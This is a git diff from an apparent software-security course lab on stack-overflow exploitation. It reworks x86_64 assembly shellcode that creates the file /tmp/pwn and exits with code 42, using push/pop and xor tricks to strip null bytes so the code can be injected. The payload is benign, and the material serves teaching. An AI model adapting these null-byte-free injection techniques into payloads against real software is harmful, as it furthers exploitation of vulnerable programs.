Working shellcode but one \0 remains

content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S

@@ -2,19 +2,27 @@
 .globl _start
 
 _start:
-    call pwnd
+    call p
 	.asciz "/tmp/pwn"
 
-pwnd:
-    # We are on x86_64, we must move 8 bytes up from stack pointer
-    popq %rdi
-    movq $0666, %rsi
-    movq $85, %rax
-    syscall
-    ret
     
-    # exit(42)
+p:
-	movq $42, %rdi
+    xorq %rdi, %rdi
-	movq $60, %rax
+    pop %rdi
+    #shr $0x8, %rdi
+    push $0xfffffffffffffd66
+    xor %rsi, %rsi
+    pop %rsi
+    neg %rsi
+    push $85
+    pop %rax
     syscall
 
+    xorq %rax, %rax
+    xorq %rdi, %rdi
+	push $42
+    pop %rdi
+	push $61
+    pop %rax
+    lea -1(%rax), %rax
+	syscall